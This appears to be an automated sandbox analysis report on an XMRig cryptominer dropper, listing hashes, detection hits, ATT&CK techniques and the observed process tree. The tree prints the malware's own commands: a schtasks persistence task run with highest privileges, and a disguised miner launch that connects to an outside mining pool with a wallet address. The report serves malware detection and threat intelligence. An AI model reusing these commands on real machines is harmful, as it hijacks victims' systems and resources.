xmrig | f63edb19e6e2269a443f1e42ce704f9e2ffcb0cdeab5e01eb16b71b31460fa61

Analysis

max time kernel
140s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
30/06/2024, 03:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f63edb19e6e2269a443f1e42ce704f9e2ffcb0cdeab5e01eb16b71b31460fa61.exe
Size

2.1MB
MD5

38c19943470080d554bd4762f26c9c36
SHA1

0c089a2b635d54deae8a298be383006368a75a82
SHA256

f63edb19e6e2269a443f1e42ce704f9e2ffcb0cdeab5e01eb16b71b31460fa61
SHA512

e3e97a78283d51eb84651c88eb74710b09253a3f43c7e38744823503c9efd790bf6546cb91d810b407bfd4ea67670a7de6d7cfa4665d2d1f6c79dca9e4014e41
SSDEEP

49152:oKcX9wMwXpXPsM0oIvYTDl/ffriD8hquPdR5l3+kC:oRuZXiHvY/lvri8h1PdA3

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 7 IoCs

miner

resource	yara_rule
behavioral2/memory/8-24-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/8-26-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/8-28-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/8-29-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/8-31-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/8-30-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/8-32-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Executes dropped EXE 2 IoCs

pid	Process
544	services64.exe
3948	sihost64.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1708 set thread context of 8	1708	conhost.exe	92

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4520	schtasks.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2900	conhost.exe
1708	conhost.exe
1708	conhost.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2900	conhost.exe
Token: SeDebugPrivilege	1708	conhost.exe
Token: SeLockMemoryPrivilege	8	cmd.exe
Token: SeLockMemoryPrivilege	8	cmd.exe

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 4600 wrote to memory of 2900	4600	f63edb19e6e2269a443f1e42ce704f9e2ffcb0cdeab5e01eb16b71b31460fa61.exe	81
PID 4600 wrote to memory of 2900	4600	f63edb19e6e2269a443f1e42ce704f9e2ffcb0cdeab5e01eb16b71b31460fa61.exe	81
PID 4600 wrote to memory of 2900	4600	f63edb19e6e2269a443f1e42ce704f9e2ffcb0cdeab5e01eb16b71b31460fa61.exe	81
PID 2900 wrote to memory of 1476	2900	conhost.exe	83
PID 2900 wrote to memory of 1476	2900	conhost.exe	83
PID 1476 wrote to memory of 4520	1476	cmd.exe	85
PID 1476 wrote to memory of 4520	1476	cmd.exe	85
PID 2900 wrote to memory of 4756	2900	conhost.exe	86
PID 2900 wrote to memory of 4756	2900	conhost.exe	86
PID 4756 wrote to memory of 544	4756	cmd.exe	88
PID 4756 wrote to memory of 544	4756	cmd.exe	88
PID 544 wrote to memory of 1708	544	services64.exe	90
PID 544 wrote to memory of 1708	544	services64.exe	90
PID 544 wrote to memory of 1708	544	services64.exe	90
PID 1708 wrote to memory of 3948	1708	conhost.exe	91
PID 1708 wrote to memory of 3948	1708	conhost.exe	91
PID 1708 wrote to memory of 8	1708	conhost.exe	92
PID 1708 wrote to memory of 8	1708	conhost.exe	92
PID 1708 wrote to memory of 8	1708	conhost.exe	92
PID 1708 wrote to memory of 8	1708	conhost.exe	92
PID 1708 wrote to memory of 8	1708	conhost.exe	92
PID 1708 wrote to memory of 8	1708	conhost.exe	92
PID 1708 wrote to memory of 8	1708	conhost.exe	92
PID 1708 wrote to memory of 8	1708	conhost.exe	92
PID 1708 wrote to memory of 8	1708	conhost.exe	92
PID 1708 wrote to memory of 8	1708	conhost.exe	92
PID 1708 wrote to memory of 8	1708	conhost.exe	92
PID 1708 wrote to memory of 8	1708	conhost.exe	92
PID 1708 wrote to memory of 8	1708	conhost.exe	92
PID 1708 wrote to memory of 8	1708	conhost.exe	92
PID 1708 wrote to memory of 8	1708	conhost.exe	92
PID 3948 wrote to memory of 552	3948	sihost64.exe	98
PID 3948 wrote to memory of 552	3948	sihost64.exe	98
PID 3948 wrote to memory of 552	3948	sihost64.exe	98

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\f63edb19e6e2269a443f1e42ce704f9e2ffcb0cdeab5e01eb16b71b31460fa61.exe
"C:\Users\Admin\AppData\Local\Temp\f63edb19e6e2269a443f1e42ce704f9e2ffcb0cdeab5e01eb16b71b31460fa61.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4600
- C:\Windows\System32\conhost.exe
  "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\f63edb19e6e2269a443f1e42ce704f9e2ffcb0cdeab5e01eb16b71b31460fa61.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2900
- - C:\Windows\System32\cmd.exe
    "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1476
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4520
- - C:\Windows\System32\cmd.exe
    "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4756
  - - C:\Users\Admin\AppData\Roaming\services64.exe
      C:\Users\Admin\AppData\Roaming\services64.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:544
    - - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
        5⤵
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1708
      - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3948
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        7⤵
        
        PID:552
      - C:\Windows\System32\cmd.exe
        
        C:\Windows/System32\cmd.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=auto.c3pool.org:19999 --user=41qBGWTRXUoUMGXsr78Aie3LYCBSDGZyaQeceMxn11qi9av1adZqsVWCrUwhhwqrt72qTzMbweeqMbA89mnFepja9XERfHL --pass=002 --cpu-max-threads-hint=40 --cinit-idle-wait=5 --cinit-idle-cpu=80
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:8

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

Filesize
539B

MD5
b245679121623b152bea5562c173ba11

SHA1
47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d

SHA256
73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f

SHA512
75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
31KB

MD5
48d8ae4446c6156ead4dbb168147ad03

SHA1
1f7377fe047e854d1313050c57df703452dbc0c8

SHA256
7355c5e93363f97576eeaa28896b0bdc08935cb6e686e8db2dfde1ff8967c168

SHA512
d8e29f0f18245e92544a9a1c5672563ad25584505711bbf8c507994937f3641276dc79c231b8891043c49c983a4cfd05b86460b125d4e238726b4b82a6b02d7c

Download Submit
C:\Users\Admin\AppData\Roaming\services64.exe

Filesize
2.1MB

MD5
38c19943470080d554bd4762f26c9c36

SHA1
0c089a2b635d54deae8a298be383006368a75a82

SHA256
f63edb19e6e2269a443f1e42ce704f9e2ffcb0cdeab5e01eb16b71b31460fa61

SHA512
e3e97a78283d51eb84651c88eb74710b09253a3f43c7e38744823503c9efd790bf6546cb91d810b407bfd4ea67670a7de6d7cfa4665d2d1f6c79dca9e4014e41

Download Submit
memory/8-31-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/8-30-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/8-32-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/8-29-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/8-28-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/8-27-0x000001F3278A0000-0x000001F3278C0000-memory.dmp

Filesize
128KB

Download
memory/8-26-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/8-24-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/552-33-0x00000245E69B0000-0x00000245E69B6000-memory.dmp

Filesize
24KB

Download
memory/552-34-0x00000245E84C0000-0x00000245E84C6000-memory.dmp

Filesize
24KB

Download
memory/2900-1-0x00007FF9A7B23000-0x00007FF9A7B25000-memory.dmp

Filesize
8KB

Download
memory/2900-2-0x000001DAF7F20000-0x000001DAF8140000-memory.dmp

Filesize
2.1MB

Download
memory/2900-3-0x000001DADF490000-0x000001DADF4A2000-memory.dmp

Filesize
72KB

Download
memory/2900-9-0x00007FF9A7B20000-0x00007FF9A85E1000-memory.dmp

Filesize
10.8MB

Download
memory/2900-0-0x000001DADD520000-0x000001DADD740000-memory.dmp

Filesize
2.1MB

Download
memory/2900-4-0x00007FF9A7B20000-0x00007FF9A85E1000-memory.dmp

Filesize
10.8MB

Download
memory/2900-5-0x00007FF9A7B20000-0x00007FF9A85E1000-memory.dmp

Filesize
10.8MB

Download